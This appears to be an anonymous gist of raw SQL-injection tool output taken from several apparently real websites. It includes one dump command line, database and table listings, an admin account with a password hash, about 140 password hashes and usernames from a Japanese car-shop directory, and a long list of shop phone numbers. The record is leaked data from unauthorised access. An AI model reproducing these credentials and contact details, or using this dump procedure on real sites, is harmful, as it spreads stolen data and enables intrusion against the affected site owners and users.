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Created August 25, 2012 14:12
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  • Save anonymous/4f8954dcf6f85cfc50e8 to your computer and use it in GitHub Desktop.
Save anonymous/4f8954dcf6f85cfc50e8 to your computer and use it in GitHub Desktop.
available databases [26]:
[*] akaedudede
[*] blog
[*] db_akaedu_new1
[*] db_akaedu_org
[*] db_diaocha
[*] db_fpga
[*] db_test
[*] db_top
[*] db_tope
[*] discuz
[*] empiredown
[*] information_schema
[*] kernel_cms
[*] kf
[*] linuxforum
[*] mail
[*] mysql
[*] phpcms
[*] ppexam
[*] ppframe
[*] pylearn
[*] pyteach
[*] supesite
[*] wordpress
[*] wpquiz
[*] yifan
available databases [14]:
[*] cnw_bbs
[*] cnw_eng
[*] cnw_ibbs
[*] cnw_other
[*] cnw_passport
[*] cnw_pld
[*] cnw_qigong_fund
[*] cnw_statistics
[*] cnw_survey
[*] cnw_total
[*] cnw_web
[*] information_schema
[*] mysql
[*] test
Database: cnw_passport
[15 tables]
| background_permissions |
| front_permissions |
| message |
| user |
| user_background_permissions |
| user_certification |
| user_fans |
| user_front_permissions |
| user_identity |
| user_login_log |
| user_publication_temp |
| user_score_log |
| user_statistics |
| user_vister |
| userinfo |
Database: cnw_passport
Table: user
[8 columns]
| Column | Type |
| is_homepage_hide | int(2) |
| nickname | varchar(40) |
| password | varchar(32) |
| portrait | varchar(100) |
| realname | varchar(60) |
| status | int(3) |
| uid | int(11) |
| username | varchar(40) |
available databases [90]:
[*] 9_sun_db
[*] admin
[*] barclay
[*] beauty
[*] best
[*] bioscholars_db
[*] c_c_chen_db
[*] cai_yi_db
[*] cds_db
[*] charlie_db
[*] chishiun_db
[*] chuener_fong_db
[*] combo_db
[*] cyia_db
[*] db_Breville
[*] db_Breville_cn
[*] db_Chi_shen
[*] db_ChnaSys
[*] db_Enterex
[*] db_geomatics
[*] db_hwdp
[*] db_jiee99
[*] db_kat
[*] db_Mem
[*] db_shark
[*] db_Travel
[*] echyun_db
[*] echyun_web_db
[*] elearing_db
[*] flyinfo_db
[*] flyinfo_member
[*] gene-chain
[*] gene-chain_db
[*] geneferm_db
[*] guan_nan_2_db
[*] happiness_db
[*] hosp_attend_system_db
[*] hospital_erp_db
[*] information_schema
[*] ipath_blog
[*] ipath_db
[*] jia_mei_db
[*] jiaen_tax
[*] jiannren_db_utf8
[*] kmc_db
[*] lzc_db
[*] madou_resthome
[*] manstrong_shop
[*] manstrong_shop_ind
[*] marquess_check
[*] masago_db
[*] mica_db
[*] mysql
[*] ncku_emba_db
[*] owp_db
[*] palyultn_db
[*] secfa_db
[*] secfa_repair_system
[*] skypro
[*] skypro_db
[*] smart_card
[*] tairjiuh_sales
[*] taiwan11_db
[*] tamaki_db
[*] teaclub_db
[*] test
[*] tjcha_db
[*] tjcha_tax
[*] tnar_db
[*] tncar_member_db
[*] tnmoto
[*] touch_blog
[*] touch_db
[*] tsic_db
[*] vision_db
[*] whm_order
[*] wusanto
[*] yct_2_db
[*] yct_db
[*] yct_learning
[*] yct_property
[*] yenchao_db
[*] ying_jia_db
[*] ymca_db
[*] ymca_nursery_db
[*] ymca_old_db
[*] ymca_tcc_db
[*] ymca_wine_db
[*] ys-tnn_db
[*] ytboiler_db
Database: flyinfo_member
[13 tables]
| admin_account |
| dep_name |
| download_img |
| download_rpt |
| event_news |
| event_reg |
| group_to_buy |
| group_to_buy_reg |
| member |
| member_login_log |
| msg_answer |
| msg_question |
| news_rpt |
Database: flyinfo_member
Table: member
[21 columns]
| Column | Type |
| acc_status | char(1) |
| address | text |
| dep | tinytext |
| dep_name_id | int(10) unsigned |
| e_mail | tinytext |
| end_date | date |
| id | int(10) unsigned |
| job | tinytext |
| keyin_date | datetime |
| keyin_man | varchar(20) |
| login_date | datetime |
| mobile | varchar(50) |
| pass_word | varchar(13) |
| realname | varchar(50) |
| remark | text |
| sex | enum('m','f') |
| start_date | date |
| tel_no | varchar(50) |
| upd_date | datetime |
| upd_man | varchar(20) |
| username | varchar(20) |
Database: flyinfo_member
Table: admin_account
[16 columns]
| Column | Type |
| acc_status | char(1) |
| authority | char(30) |
| dep | tinytext |
| e_mail | varchar(150) |
| end_date | date |
| id | int(10) unsigned |
| job | tinytext |
| keyin_date | datetime |
| keyin_man | varchar(20) |
| pass_word | varchar(13) |
| realname | tinytext |
| remark | text |
| start_date | date |
| upd_date | datetime |
| upd_man | varchar(20) |
| username | varchar(20) |
Database: flyinfo_member
Table: admin_account
[1 entry]
| acc_status | authority | dep | e_mail | end_date | id | job | keyin_date | keyin_man | pass_word | realname | remark | start_date | upd_date | upd_man | username |
| 1 | 111111111111111111111111111111 | MIS | | 9999-12-31 | 1 | NULL | 2011-05-26 10:01:54 | NULL | adpNaFzzBd/3w | NULL | NULL | 2004-01-01 | 2011-05-26 10:01:54 | NULL | admin_flyinfo |
Database: ipc_production
[288 tables]
| admin_user |
| dams_asset_asset_rel |
| dams_asset_content_type_rel |
| dams_asset_group_shared_users |
| dams_asset_rel_type |
| dams_assetdetails |
| dams_assetgroup |
| dams_assetgroup_asset_rel |
| dams_assetgroup_assetgroup_rel |
| dams_assetgroup_propertydetails |
| dams_assetgroup_type |
| dams_assetgroup_type_propertygroup_rel |
| dams_assetgroup_type_rel |
| dams_assetmaster |
| dams_assetpropertydetails |
| dams_content_type |
| dams_content_type_mime_type_rel |
| dams_content_type_propertygroup_rel |
| dams_data_type_master |
| dams_data_type_validation |
| dams_export_details |
| dams_export_master |
| dams_export_schema |
| dams_export_schema_details |
| dams_export_schema_imagedetails |
| dams_import_details |
| dams_import_ftplist |
| dams_import_master |
| dams_import_product_asset_rel |
| dams_import_product_details |
| dams_import_schema |
| dams_import_schema_details |
| dams_menu_master |
| dams_mime_type_rel |
| dams_mime_types |
| dams_myasset |
| dams_permission_group_master |
| dams_permission_master |
| dams_property_group_optional_values |
| dams_property_group_validation_rules |
| dams_property_optional_values |
| dams_propertygroup |
| dams_propertygroup_nested |
| dams_propertygroup_permission_rel |
| dams_propertygroup_permissions |
| dams_propertygroup_property_rel |
| dams_propertygroup_propertygroup_rel |
| dams_propertygroup_role_rel |
| dams_propertymaster |
| dams_recent_search |
| dams_role_master |
| dams_role_permission_rel |
| dams_role_user_rel |
| dams_tags |
| dams_tags_assets_rel |
| dams_userconfig |
| dams_validation_fields |
| dams_validation_master |
| dams_validation_values |
| ipc_languages |
| ipc_search_languages |
| ipc_site_clusters |
| ipc_timezones |
| iplat_alert_failedemailids |
| iplat_alertarchives |
| iplat_alertarchives_attachments |
| iplat_alertqueue |
| iplat_alertqueue_attachments |
| iplat_city_master |
| iplat_configurations |
| iplat_continent_master |
| iplat_country_master |
| iplat_currency_master |
| iplat_ecomm_agency |
| iplat_ecomm_agency_email_rel |
| iplat_ecomm_agency_rule |
| iplat_emaileditor |
| iplat_feedback |
| iplat_feedback_env |
| iplat_indexing_queue |
| iplat_ioffline_api_key |
| iplat_itunes_product_identifier |
| iplat_newsletter_subscription |
| iplat_newsletters |
| iplat_pdf_comments |
| iplat_pdf_details |
| iplat_pdf_publisher |
| iplat_site_title_sort_configuration |
| iplat_state_master |
| iplat_vi_widget_delete_queue |
| ipub_affiliaite_program_restricted |
| ipub_affiliate_commission_user_action |
| ipub_affiliate_link_type_master |
| ipub_affiliate_profile |
| ipub_affiliate_program |
| ipub_affiliate_program_commission_action_rel |
| ipub_affiliate_program_join |
| ipub_affiliate_program_link_master |
| ipub_affiliate_publisher |
| ipub_distribute_aggregate_summary_report |
| ipub_distribute_distribution_summary_report |
| ipub_distribute_schedule_summary_report |
| ipub_distribute_titles_summary_report |
| ipublish_account_type |
| ipublish_account_type_config_rel |
| ipublish_account_type_config_value |
| ipublish_acs4_distribution_rights |
| ipublish_acs4_distributor_site_rel |
| ipublish_acs4_distributors |
| ipublish_acs4_download_notify |
| ipublish_acs4_errors |
| ipublish_acs4_fulfillment |
| ipublish_acs4_fulfillment_item |
| ipublish_acs4_fulfillmentcron_status |
| ipublish_acs4_permission_master |
| ipublish_acs4_permission_product_rel |
| ipublish_acs4_process |
| ipublish_acs4_process_details |
| ipublish_acs4_process_distribution_rights_rel |
| ipublish_acs4_process_distributor_rel |
| ipublish_acs4_process_product_rel |
| ipublish_acs4_products |
| ipublish_acs4_products_status |
| ipublish_acs4_publisher_settings |
| ipublish_acs4_settings |
| ipublish_acs4_user |
| ipublish_admin_permission_master |
| ipublish_admin_role_master |
| ipublish_admin_role_permission_relation |
| ipublish_affiliates |
| ipublish_affiliates_referals |
| ipublish_affiliates_user_rel |
| ipublish_asset_config |
| ipublish_asset_site_config |
| ipublish_assetgroup_status |
| ipublish_captions |
| ipublish_category_group_type |
| ipublish_client_master |
| ipublish_config_process |
| ipublish_config_process_status |
| ipublish_config_processdetails |
| ipublish_config_version |
| ipublish_content_process |
| ipublish_content_process_statistics |
| ipublish_content_reprocess |
| ipublish_content_site_specifications |
| ipublish_coverart_eup_queue |
| ipublish_delivery_channel_master |
| ipublish_delivery_channel_media_rel |
| ipublish_delivery_channel_media_supported_options |
| ipublish_delivery_channel_price_rule_rel |
| ipublish_demorequests |
| ipublish_device_support |
| ipublish_device_support_action_rel |
| ipublish_devicesupport_publisher_rel |
| ipublish_devicesupport_wholeproduct_rel |
| ipublish_discount_batch_master |
| ipublish_discount_master |
| ipublish_discount_product_rel |
| ipublish_discount_user_rel |
| ipublish_distribute_asset_distributed_log |
| ipublish_distribute_distribution_process |
| ipublish_distribute_distribution_process_log |
| ipublish_distribute_distributor |
| ipublish_distribute_distributor_action |
| ipublish_distribute_distributor_action_rel |
| ipublish_distribute_distributor_config |
| ipublish_distribute_distributor_details |
| ipublish_distribute_distributor_format_rel |
| ipublish_distribute_distributor_product_assets |
| ipublish_distribute_distributor_product_fields |
| ipublish_distribute_distributor_schema |
| ipublish_distribute_distributor_schema_rel |
| ipublish_distribute_ftp_account_rel |
| ipublish_distribute_metadata_distributed_log |
| ipublish_distribute_product_asset_validation |
| ipublish_distribute_product_enabled |
| ipublish_distribute_product_metadata_rel |
| ipublish_distribute_product_metadata_validation |
| ipublish_distribute_product_status |
| ipublish_distribute_publisher_distributor_rel |
| ipublish_distribute_schedule |
| ipublish_distribute_schedule_product_rel |
| ipublish_duration_master |
| ipublish_ecomm_rule_tax_shipping |
| ipublish_ecomm_shipping_cost |
| ipublish_ecomm_shipping_option |
| ipublish_ecomm_tax_rule |
| ipublish_ecomm_tax_type |
| ipublish_ecomm_zones |
| ipublish_email_placeholder |
| ipublish_email_placeholder_template_rel |
| ipublish_email_template_master |
| ipublish_events_master |
| ipublish_export_log |
| ipublish_faqs |
| ipublish_faqs_category |
| ipublish_faqs_category_rel |
| ipublish_feature_master |
| ipublish_feature_placeholder_rel |
| ipublish_format_device_support_rel |
| ipublish_format_publishing_settings |
| ipublish_format_type |
| ipublish_free_product |
| ipublish_ftp_account |
| ipublish_image_dimensions |
| ipublish_import_log |
| ipublish_language |
| ipublish_marketing_quote |
| ipublish_marketing_talktous |
| ipublish_media |
| ipublish_media_format |
| ipublish_media_format_product_type_rel |
| ipublish_media_format_rel |
| ipublish_mimetype_assettype_rel |
| ipublish_mimetype_process_definition |
| ipublish_package_attributes |
| ipublish_package_query |
| ipublish_pdfpagemapping |
| ipublish_pdfpagemapping_data |
| ipublish_pdfpagemapping_rows |
| ipublish_pdfpagemapping_styles |
| ipublish_pincode_batch_master |
| ipublish_pincode_email_rel |
| ipublish_pincode_master |
| ipublish_price_export_log |
| ipublish_price_import_log |
| ipublish_product_category_master |
| ipublish_product_category_rel |
| ipublish_product_delivery_channel_rel |
| ipublish_product_delivery_channel_rel_new |
| ipublish_product_device_support_rel |
| ipublish_product_format_metadata_rel |
| ipublish_product_media_format_rel |
| ipublish_product_media_format_rel_bak |
| ipublish_product_metadata_fields |
| ipublish_product_pincode_rel |
| ipublish_product_price_acs4permission_rel |
| ipublish_product_price_rel |
| ipublish_product_price_rule |
| ipublish_product_price_type |
| ipublish_pub_location |
| ipublish_pub_segment |
| ipublish_pub_type |
| ipublish_publish_site_queue |
| ipublish_publish_site_queue_details |
| ipublish_publisher |
| ipublish_publisher_assetgroup_type_rel |
| ipublish_publisher_delivery_channel_media_rel |
| ipublish_publisher_device_support_rel |
| ipublish_publisher_format_type_rel |
| ipublish_publisher_propertygroup_rel |
| ipublish_publisher_settings |
| ipublish_reader_config |
| ipublish_reader_publish_details |
| ipublish_site_coverart_config |
| ipublish_sites_master |
| ipublish_sites_product_rel |
| ipublish_social_bookmarking |
| ipublish_thirdparty_apikey_rel |
| ipublish_thirdparty_site_master |
| ipublish_toc |
| ipublish_toc_backup |
| ipublish_toc_seq |
| ipublish_version |
| ipublish_vi_widget_assets_rel |
| ipublish_vi_widget_config |
| ipublish_vi_widget_controlfeature_details |
| ipublish_vi_widget_distributors |
| ipublish_vi_widget_rel |
| ipublish_vi_widget_search_report |
| ipublish_viewinside_config |
| ipublish_viewinside_reports |
| ipublish_visitor_info |
| ipublish_widget_config |
| ipublish_widget_dimensions |
| ipublish_widget_dimensions_rel |
| ipublish_widget_dimensions_theme_rel |
| ipublish_widget_reports |
| ipublish_widget_socialbookmark_rel |
| ipublish_widget_theme |
| ipublish_widget_type |
| onix_codelist |
| onix_tag_rel |
| onix_tags |
| record |
| record_bak |
| user_master |
Database: ipc_production
Table: ipublish_acs4_user
[3 columns]
| Column | Type |
| acs4_user_status | enum('ACTIVE','INACTIVE') |
| acs4_user_uuid | text |
| acs4_userid | bigint(20) |
python --random-agent -o -u -D nbanews_nhw5 -T links -C url --dump --text-only
available databases [2]:
[*] information_schema
[*] nbanews_nhw5
Database: nbanews_nhw5
[7 tables]
| admin |
| ads |
| config |
| links |
| linkso |
| online |
| redirect_host |
Database: nbanews_nhw5
Table: admin
[1 entry]
| admins | ads | config | email | id | links | name | notes | password | username |
available databases [1]:
[*] article
| 1 | 1 | 1 | | 1 | 1 | \d8\a7\d9\84\d9\85\d8\b4\d8\b1\d9\81 \d8\a7\d9\84\d8\b9\d8\a7\d9\85 | \d8\b4\d8\b1\d9\8a\d8\b7 \d8\b9\d9\85\d8\b1\d9\88 \d8\af\d9\8a\d8\a7\d8\a8 \d8\a7\d9\84\d8\ac\d8\af\d9\8a\d8\af | q]z/q]z/ | admin |
available databases [4]:
[*] devel_kaizousha_com
[*] information_schema
[*] kaizousha_qadb
[*] www_kaizousha_com
Database: devel_kaizousha_com
[22 tables]
| adcount |
| baner |
| car_viewcount |
| car_viewcount_old |
| carcate |
| caropttbl |
| carpartscate |
| carpartssubcate |
| carpartstbl |
| carshoptbl |
| cartbl |
| gallery |
| l_category_master |
| linkcate |
| linktbl |
| m_category_master |
| mastercardb |
| search_field |
| topics |
| tuneshop |
| usertbl |
| yougo |
Database: devel_kaizousha_com
Table: usertbl
[20 columns]
| Column | Type |
| d_tmp | varchar(50) |
| id | int(11) |
| kai_keisai | int(1) |
| keisai_num | int(11) |
| keisai_num_parts | int(11) |
| oshiete | int(1) |
| pwd | varchar(32) |
| regdate | date |
| satei_flag | int(1) |
| shopid | int(5) |
| shopname | varchar(50) |
| shoptype | varchar(5) |
| shopurl | varchar(255) |
| susume_flag | int(1) |
| textad1 | varchar(100) |
| textad2 | varchar(100) |
| textad3 | varchar(100) |
| userid | varchar(16) |
| useropt | varchar(10) |
| usertype | varchar(10) |
Database: devel_kaizousha_com
Table: usertbl
[140 entries]
| pwd |
| efe072d9fe2f6f4b61437a581d25740d |
| efe072d9fe2f6f4b61437a581d25740d |
| efe072d9fe2f6f4b61437a581d25740d |
| 1d698297ba23a3382eaf480a3969731d |
| c27eac524936a549f8f5eb9279048ede |
| d1b0e735df4da52cb205084811465154 |
| 4da55b1af8068ea6dec19a64feb11176 |
| efe072d9fe2f6f4b61437a581d25740d |
| c52c61531bb8b017b2fe625321192824 |
| 8dc1ce5e82606ba946bce24b4a25bc25 |
| e5727474563a81e22bc5909dfa485b24 |
| de5c810d2f53126422121f8e4c2b08ef |
| 0a8bc6e03e40b028f21c0bcc60e52b79 |
| 40250c937416e3a600fa49145a2297e9 |
| 634e4a74c421c3cf01ca3496f9a2566d |
| 1250725bcaaeb76e0b3fc6da975eea84 |
| 03eabf7adadc26d8ac68787d4afffe54 |
| 2db5bb916c72cfc9eb6aa85bf6a00a56 |
| cbd8985be186c7293f502c46832b6078 |
| 16a5c6ffdeed96efe0fbc22cf300cc5a |
| af2cb19a85c3a8dd9b5d49b484e7e4ab |
| 57398a7f397bc416544591ac013f333d |
| 6d041b299dc1e5682116f4d928e3259c |
| e61fd1c8054e528e22862e146c111a89 |
| ef53ad59e187ca465cca16aa94eb5b59 |
| db39a10b31ae6fc6e5fd6d94d0d505c0 |
| 1fae07db1591ce13a8c2f65826a3a10b |
| 3d999d10f515e52559fceeefef748caa |
| e08bc636c83ae44d6c771f5646271b57 |
| ad6cee16110cca0fa1d6ad74ca8f1c18 |
| a7a80331e68fc05a87dfc3a518e9e48a |
| daf2febdc985dd79a24e79999a41ba80 |
| 931937ae1de1711308db3b0d687e1d77 |
| 6de9da5b1b19eb9ee9aefa540dd51672 |
| e7f603346675dbf1e04b7df8cb6d1cce |
| be2ebbf2b8607d35091c8c15d130ab77 |
| 5c63cd725c1af299e7d9060a8b8430a4 |
| 31be37109c89be588043cf51db876fd6 |
| 44be96c4c6b7091f5b2fdeb0fdc852c4 |
| f833347ed37fbaba44d92757be22db1b |
| 6001c7e725312910dbaaa237eaefe6a4 |
| 68d39c0cccf76c332e674dbaf708bf5c |
| 8b8b2f91fa3701c87688f4a521fc9265 |
| 8a8ecfdb41c6f74b58fdbf6e5fb5c999 |
| e0abd646437e48f5fab78f18dffa073e |
| a6e9cf777313be4ef2ca9f423f637faa |
| 03619a6f4e342af72753b2501295cabf |
| b48d69542f57f04d02b488586e349c56 |
| 2d208a72596a4e9a75809644a22c5c59 |
| 032151a92ef7e54467848bd0ed25fb08 |
| 26e6c99ec0145eaafa404af95235f873 |
| 1d09e03ccf60cb83e5392d3667f847cb |
| aa4e5f408c3a04a5c645800cdd25e4e8 |
| 3c2eaf1d84e80a671241ef0f27df9315 |
| e527cd830140544fe65aeb1d47e55a09 |
| 650ce8124a091b61447f66d3d656e161 |
| 4a7f4128ce413c83018c363235f3b8f8 |
| 53225b8e3b702c08c9fbc5b87de8064c |
| 555317db1aa5c4bce102aae11a4b89f4 |
| aba93060814c84e9fccca8962c539204 |
| ac5f1d4a50c1e5e0dc1badbf1c958c27 |
| 165c468905fa4e852e23d2ab8ab2c33a |
| 87198926b677ef3250d6aea27d61bda1 |
| 64cbc1615b03c46eef37aed5daeea3d8 |
| 8a40f40189c7ec0a726ff31268e76cd1 |
| 9ece4c748a60692ebd797e0d550483e6 |
| 75d34eb8e384b554e940e25b6a1b71ca |
| 55270444f8cb2f48d063b51d7caad2ef |
| b3998072fa2bd1fdd28015482c9d1a9a |
| e3cdf70a99c1d6890c54ad56bd4a5de1 |
| 7f7729d6247280f34a8a6c195f82550a |
| 988fb4e08fec9ecd9fa132c46ff875af |
| 2e7b5ea7451758f1fe57dcf3bd7d1d30 |
| fb16dbc86bdafc208c498ae15d07df3e |
| 61818e731c950db68dcb025778734ef2 |
| 0a29c004feb015fbc590f1e0bd554e3e |
| 9ba91ed889aca798eba114940f7f0e8f |
| 3ca889ad17d80c27b46813e039685f92 |
| 23c7c6ba515523c21f3d1c1762dbe7c5 |
| 3923a040097b446dde56951a066143af |
| 1f598531bd53de9ee081bdf39310bd64 |
| dcba60b05c58f536cffb6cc160121ae9 |
| b46134d9975fac1812470dbc60326165 |
| 5fc325ecd052e3aa47e063d954591ce9 |
| 5b776b4aeed9a6abe4c8f6e26aa3b74f |
| 6d73d8d1a23ebec3c077ab1f93f3319b |
| 8702845e8efb71aea50bc2a9829d2088 |
| 3e5f34068c4914c7130ccb55c63e47f6 |
| 36a20604aa73222006b3a8092f3fe20d |
| 354ec3f5ca9eb9dadc4f2f3fe0ca2719 |
| e7ba60c7469ca63bc47ab081d14b61c4 |
| 56df9cd706fc1255c907b7c7c4bd9d85 |
| e6636d48230e68b4a47960d1c45aa430 |
| c8a824377940a4f33da3348d745697e6 |
| 90a89603bce2776fb3bd694903f0cd1b |
| 8cb140f07c2f31392b1c2b0c123a3cfe |
| f06c5d09cfa99bc9f7b3457e67f54a09 |
| eab51d606aa5ccbc993f13303e40dcd7 |
| 42702dbaa8d4f6fbbfebabb8cde7b234 |
| 2aaf2f25a8abf40ba489a89af0a30871 |
| 3db286cc805e66e763fba9b5370856e9 |
| a39657f37f3e1741759c10e30ffae0be |
| 252622c5397efd7801d105c578d69d3d |
| 65abd3610cc08ab0b403e3dc4daad1bb |
| 75135fdeab40825447e8a267ec330306 |
| 6fd531fe08b9811a5175d2458d7bb8d7 |
| 612484f9ad0b8b7758307cc1517e525e |
| bf56a4be1b26d4115b5ed703d7e711fd |
| dc2c82096f856fd5891f74fa6deab603 |
| ae6b6b961b94ddebb410a6c9293e87d2 |
| fc3d4aa471fc31b2bb2806edc5435341 |
| 8eac26f1909e753b3e99f3f47a71f542 |
| aba799c87d8bb18f7ea1c62205173347 |
| 45b659b83e6c5a481abc4f45143774c3 |
| 93cc11485429722290c19335cc4c231b |
| 0d90ee21c9d74cf9a90ee38d2e1adf84 |
| 5168135ad9473797027a4258fc186579 |
| 73a2b1249b739374fcd635859190259b |
| b9baba2f90432caafe90ded02c725ceb |
| f2cccb4045e6bc4b992f89e140553956 |
| 9e570245f7384be3430bbed9149ff772 |
| 81dc9bdb52d04dc20036dbd8313ed055 |
| a964c0e5a10ce281a8b4671358c01e5f |
| 6462807771e81d9c33eb99307f5f3e77 |
| 2385b0a8f869d1fa68421799735d3ce2 |
| b61e81f7e69c514e120d203ed4c72222 |
| 6b4bc745ca41d3f5373b48e69e8f54ee |
| e3c0dd78eaacb4d97199d2ec90ae8b91 |
| e2bf6ffe3d27b80578b8d6d2dea653bb |
| 35e9fefd4614234d74be319874fb5ce6 |
| b59c67bf196a4758191e42f76670ceba |
| a4c52b812679e19033f7132b6da1a5be |
| e0abd646437e48f5fab78f18dffa073e |
| ec6cd79d2782dd1a5d723586ef6b99e1 |
| 9e591778303afad40ddac395a984be39 |
| 0fca527a21811cfb831063c7f31b838a |
| 1475dec6c9d019dc5a04b40a62e0471c |
| 1e6320c238fe63b7f37e0080dbfa838a |
| e10adc3949ba59abbe56e057f20f883e |
| 9cbf8a4dcb8e30682b927f352d6559a0 |
Database: devel_kaizousha_com
Table: usertbl
[140 entries]
| userid |
| kingbuyer |
| kaizousha |
| garage-r |
| sudo |
| corns |
| bulldog_ng |
| redmegaphone |
| speed |
| bross |
| barikiya_ng |
| r-magic_ng |
| sonic boon |
| LEAD |
| dogfightpro_ng |
| adept |
| autocraft_ng |
| curve_ng |
| atoz_ng |
| takeros |
| risky |
| nostalgia |
| zimax |
| feast_ng |
| dream |
| pitroadm |
| dunamisracing_ng |
| okada-eng_ng |
| rewing_ng |
| kodatespecial |
| asksport |
| GarageM_ng |
| project7_ng |
| marumi |
| I-Feelin |
| R31HOUSE_ng |
| KissDrive |
| Silky Style |
| proshopzone_ng |
| shounan |
| bluepoint |
| zrs_ng |
| kidsheart |
| garagenakagawa |
| redribbon_ng |
| sodafactory_ng |
| Attractive_ng |
| vfactory_ng |
| rspirit |
| raisam |
| windsauto |
| tanakaauto_ng |
| selectionr_ng |
| carshopgoods |
| fineproject_ng |
| booz_ng |
| worldfriends_ng |
| sunlinesuto_ng |
| autoworksk2 |
| arikawa |
| dreamauto_ng |
| w-speed_ng |
| rockyauto_ng |
| hokue_ng |
| shiftup_ng |
| juniorauto_ng |
| garagelizard_ng |
| garagesolution |
| m-staff_ng |
| hdo_ng |
| castsports |
| topsecret |
| daytona_ng |
| rspantera |
| garage-wing |
| hasegawa |
| sakamoto |
| gp.1 |
| factory-mk |
| prestige_ng |
| technoart |
| patiosports |
| starroad |
| japanracetrack |
| cf-autocraft |
| i-size |
| blow |
| crewch |
| stgarage |
| carsnavi |
| garageanything |
| demo-shop |
| autoreal |
| rh-factory |
| whitecrow |
| reverse |
| dec-i_ng |
| shaft-auto |
| topone |
| works |
| kmssoeno |
| garagesawada |
| nstyle |
| usedstation |
| musasino |
| rhbull |
| marcyAuto |
| bestcar |
| wonder |
| camel-auto |
| morris |
| risaia |
| selection |
| evans |
| victory50 |
| prego |
| bikoworks |
| t-and-e |
| imperialcraft |
| rem |
| kenauto |
| demo |
| ysengin |
| calstage |
| flyrat |
| endless |
| kazuu |
| rsaizawa |
| patiogt |
| hundred |
| oz |
| blackgate |
| strwakai |
| autocircle |
| riseup |
| Auto-project |
| factory-win |
| gr-misato |
| jap |
| zhaohe |
Database: devel_kaizousha_com
Table: carshoptbl
[27 columns]
| Column | Type |
| access_comm | text |
| common_comm | text |
| id | int(11) |
| qrcode | varchar(50) |
| regdate | date |
| shopadd | varchar(150) |
| shoparea | varchar(50) |
| shopcomm | text |
| shopdesc | varchar(255) |
| shopfax | varchar(100) |
| shophday | varchar(100) |
| shopid | int(11) |
| shopido | varchar(20) |
| shopimg | varchar(50) |
| shopimg01 | varchar(50) |
| shopimg02 | varchar(50) |
| shopimg03 | varchar(50) |
| shopkeido | varchar(20) |
| shopkeywords | varchar(200) |
| shopmail | varchar(100) |
| shopname | varchar(100) |
| shoptel | varchar(100) |
| shopurl | varchar(255) |
| time_AM | varchar(20) |
| time_PM | varchar(20) |
| time_rsv | varchar(150) |
| titleimg | varchar(50) |
Database: devel_kaizousha_com
Table: carshoptbl
[177 entries]
| shopmail |
| |
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| |
| @ |
| @ |
| @ |
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| @ |
| @ |
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| @ |
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| @ |
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| MAIL |
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Database: devel_kaizousha_com
Table: carshoptbl
[177 entries]
| shoptel |
| 03-5662-7000 |
| 047-359-3333 |
| 03-5678-5333 |
| 0466-49-5222 |
| 045-941-8800 |
| 044-980-4545 |
| 042-855-5500 |
| 048-812-6250 |
| 048-790-1110 |
| 0466-86-6321 |
| 089-968-6805 |
| 03-3678-1651 |
| 03-3656-2323 |
| 04-7190-1220 |
| -- |
| 045-475-5558 |
| 048-977-9891 |
| 048-859-6811 |
| 04-7138-0990 |
| 048-791-4117 |
| 045-590-0300 |
| 03-3867-2500 |
| 049-247-3250 |
| 042-590-7555 |
| 04-2957-2466 |
| 048-745-2026 |
| 096-273-2679 |
| 047-320-6155 |
| 047-489-3232 |
| 03-3696-1870 |
| 0795-32-2348 |
| 03-5988-3877 |
| 043-298-6661 |
| 058-324-6548 |
| -- |
| 045-960-1690 |
| 072-339-1760 |
| -- |
| 03-5678-5333 |
| 03-5674-1166 |
| 03-3565-3900 |
| 047-484-0330 |
| 043-257-0900 |
| 0467-55-2444 |
| 042-794-7770 |
| -- |
| 048-467-6075 |
| 048-776-4690 |
| 048-729-1066 |
| 0564-58-7080 |
| 0829-34-3322 |
| -- |
| 0774-64-6466 |
| 055-080-0707 |
| 03-5686-8155 |
| 0425-69-1425 |
| 03-5661-3836 |
| 042-689-6178 |
| 0297-62-4696 |
| 03-3877-2039 |
| 099-238-7477 |
| 026-283-7001 |
| 0270-23-9370 |
| 0790-66-3359 |
| 096-388-1858 |
| 059-364-1225 |
| 0172-26-3339 |
| 011-823-8000 |
| 022-361-4744 |
| 04-2935-2255 |
| 022-771-8650 |
| 011-851-3000 |
| 045-825-9781 |
| 0574-28-0899 |
| 080-3024-6729 |
| 046-210-1602 |
| 042-703-6670 |
| 046-236-6330 |
| 011-789-4730 |
| 0568-24-1222 |
| 0297-63-2070 |
| 011-787-7733 |
| 043-214-0560 |
| 0794-64-2231 |
| 0480-62-2040 |
| 042-682-4414 |
| 048-532-1006 |
| 072-843-5570 |
| 028-667-1006 |
| 042-532-7323 |
| 027-320-2678 |
| 011-792-2470 |
| 096-388-2386 |
| 03-5851-3505 |
| 024-539-7371 |
| 086-209-0555 |
| 052-623-5050 |
| 053-442-2313 |
| 042-730-3922 |
| 03-5678-5333 |
| 03-5678-5333 |
| 0748-72-7724 |
| 0974-26-4120 |
| 0725-39-2880 |
| -- |
| 03-5668-5675 |
| 0797-20-9833 |
| 0568-52-0777 |
| 084-945-0856 |
| 092-940-1332 |
| 043-216-8808 |
| 092-513-7300 |
| 0544-58-4837 |
| 0297-61-5555 |
| 0297-66-1000 |
| 0297-77-1000 |
| 0285-56-7000 |
| 093-647-0707 |
| 072-883-0808 |
| 0255-70-5326 |
| 042-777-7181 |
| 0237-84-4143 |
| 048-489-6655 |
| 03-5661-3836 |
| 042-777-0453 |
| 0596-53-0070 |
| 055-986-9150 |
| 043-236-1965 |
| 046-244-1283 |
| 06-6787-9008 |
| 052-411-3830 |
| 078-685-3300 |
| 0285-82-4870 |
| 042-677-3915 |
| 0968-53-0999 |
| 0463-37-4417 |
| 045-590-6231 |
| 04-2965-6080 |
| 048-660-5201 |
| 0463-97-2885 |
| 082-426-1206 |
| 03-5678-5333 |
| 079-434-4800 |
| 0586-43-7050 |
| 086-956-0081 |
| 03-3557-8866 |
| 048-477-0099 |
| 048-449-0330 |
| 0426-91-3939 |
| 03-3723-2459 |
| 011-748-7386 |
| 092-940-1888 |
| 0575-24-9889 |
| 045-913-3130 |
| 042-761-5717 |
| 076-242-2167 |
| 072-234-1400 |
| 072-260-7000 |
| 0833-47-2026 |
| 042-799-0202 |
| 0479-76-7644 |
| 078-969-2555 |
| -- |
| 022-797-4611 |
| 046-254-8798 |
| 04-2937-6662 |
| 048-422-3434 |
| 048-851-2180 |
| 0493-53-4144 |
| 0297-61-3156 |
| 027-212-6988 |
| 011-775-1155 |
| 03-3641-0010 |
| 047-392-2416 |
| 03-3745-7788 |
| 043-488-6811 |
| 048-957-9000 |
Database: devel_kaizousha_com
Table: carshoptbl
[177 entries]
| shopfax |
| 03-5662-7688 |
| 047-359-1155 |
| -- |
| 0466-49-5333 |
| -- |
| -- |
| -- |
